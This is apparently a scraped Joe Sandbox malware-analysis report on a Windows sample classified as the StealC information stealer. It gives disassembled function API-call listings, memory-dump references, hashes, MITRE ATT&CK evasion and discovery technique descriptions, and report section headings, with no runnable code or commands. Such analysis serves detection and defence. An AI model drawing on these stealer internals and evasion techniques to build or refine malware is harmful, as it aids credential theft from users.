Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545

Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
lstrcat.KERNEL32(00000000), ref: 0248C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction ID: 6cc2eba8d89054c588752b1a60137795d63c19e4b89697da8e18907bc53cb90b
Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction Fuzzy Hash: 2F315A71E10268DBCF24EFA5CC84A9EB7F2AF44308F1444ABD814AB651DB74DA41DFA0

Function 0248C4D0 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9

Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592

Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0

Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545

Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
lstrcat.KERNEL32(00000000), ref: 0248C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
Instruction ID: 4b9b4eea114c58dccddd93ebaa6a896adb986954ca8b5129f011c9f8147d7a8f
Opcode Fuzzy Hash: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
Instruction Fuzzy Hash: AD314771E102649BDF24EFB5CC84A9EBBF2AF84308F14446BD814AB651DB74DA42DF60

Function 00421550 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00421581
lstrcpy.KERNEL32(00000000,?), ref: 004215B9
lstrcpy.KERNEL32(00000000,?), ref: 004215F1
lstrcpy.KERNEL32(00000000,?), ref: 00421629

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4

Function 00401410 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401510: lstrcpy.KERNEL32(00000000), ref: 0040152D
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 0040154F
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401571
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401593

lstrcpy.KERNEL32(00000000,?), ref: 00401437
lstrcpy.KERNEL32(00000000,?), ref: 00401459
lstrcpy.KERNEL32(00000000,?), ref: 0040147B
lstrcpy.KERNEL32(00000000,?), ref: 004014DF

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
Instruction ID: 368a80f0553ecf631160e054036b62fbe6d7ddfceb8bd69434bdfc69ba453b92
Opcode Fuzzy Hash: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
Instruction Fuzzy Hash: 4A31A575A01B029FC728DF3AD588957BBE5BF48704700492EA956D3BA0DB74F811CB94

Function 02471677 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02471777: lstrcpy.KERNEL32(00000000), ref: 02471794
Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717B6
Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717D8
Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717FA

lstrcpy.KERNEL32(00000000,?), ref: 0247169E
lstrcpy.KERNEL32(00000000,?), ref: 024716C0
lstrcpy.KERNEL32(00000000,?), ref: 024716E2
lstrcpy.KERNEL32(00000000,?), ref: 02471746

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction ID: 766c5db6cba4c899d4a7117cd1b19d9887c966880557d0b52cfe1b76c506300d
Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction Fuzzy Hash: 68318274A11B42AFD724DF3AC988996BBE5BF49705704492E98AAC3B50DB74F410CF90

Function 02471673 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02471777: lstrcpy.KERNEL32(00000000), ref: 02471794
Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717B6
Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717D8
Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717FA

lstrcpy.KERNEL32(00000000,?), ref: 0247169E
lstrcpy.KERNEL32(00000000,?), ref: 024716C0
lstrcpy.KERNEL32(00000000,?), ref: 024716E2
lstrcpy.KERNEL32(00000000,?), ref: 02471746

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction ID: bdec70f25dfcaadc5ec983c0d229c25c7ea21aae892e60d6a75f572ff50471a3
Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction Fuzzy Hash: 85318274A11B42AFD724DF3AC988996B7F5BF48705704492E98AAC3B50DB74F411CF90

Function 024917B7 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 024917E8
lstrcpy.KERNEL32(00000000,?), ref: 02491820
lstrcpy.KERNEL32(00000000,?), ref: 02491858
lstrcpy.KERNEL32(00000000,?), ref: 02491890

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction ID: 24e8c23124e757e9e5cb1ad489bd846639bad7103a5dd256910016faf65014a0
Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction Fuzzy Hash: F621B1B4601B039BDB34DF6AC998A17BBE6AF44744B144A1E989AC7B40DB74E400DFA0

Function 0248C39D Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0

Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545

Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
lstrcat.KERNEL32(00000000), ref: 0248C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$SystemTimelstrlen
String ID:
API String ID: 3486790982-0
Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction ID: b79be7571857a1a20c93ee3ade479e0838a49a3c7ba9a526cec201347e2802aa
Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction Fuzzy Hash: 95215770E20255DBCF24EFA5CC88AAEBBF2AF44308F14446BD811AB251DB74D941DFA0

Function 00406E32 Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406E40
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
HeapAlloc.KERNEL32(00000000), ref: 00406EBB

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID:
API String ID: 1643994569-0
Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction ID: 021ca828da5bfa0a796bb6e6c33eee2a11837a2b1fb4363adf8c912b1a52eb88
Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction Fuzzy Hash: 9A218CB06007029BEB248B21DC84BBB73E8EB40704F44447DEA47DB684EBB8E951CB95

Function 00401510 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 0040152D
lstrcpy.KERNEL32(00000000,?), ref: 0040154F
lstrcpy.KERNEL32(00000000,?), ref: 00401571
lstrcpy.KERNEL32(00000000,?), ref: 00401593

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
Instruction ID: 156e9cd4061fd8f5e73776b1d1d3add2ecf4c06161da7b3eeeca5abdbe74678b
Opcode Fuzzy Hash: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
Instruction Fuzzy Hash: 86111275A01B02ABDB14AF36D95C927B7F8BF44305304463EA457E7B90EB78E800CB94

Function 02471777 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 02471794
lstrcpy.KERNEL32(00000000,?), ref: 024717B6
lstrcpy.KERNEL32(00000000,?), ref: 024717D8
lstrcpy.KERNEL32(00000000,?), ref: 024717FA

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
Instruction ID: 11f6747c451c644dde8b929397a9c56f0b277147c0227c4b6b965823df097052
Opcode Fuzzy Hash: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
Instruction Fuzzy Hash: 7511F174A11B029BD7349F36D858967B7F9FF446457044A2E98AED3B40EB74E401CFA0

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SEejSLAS9f.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

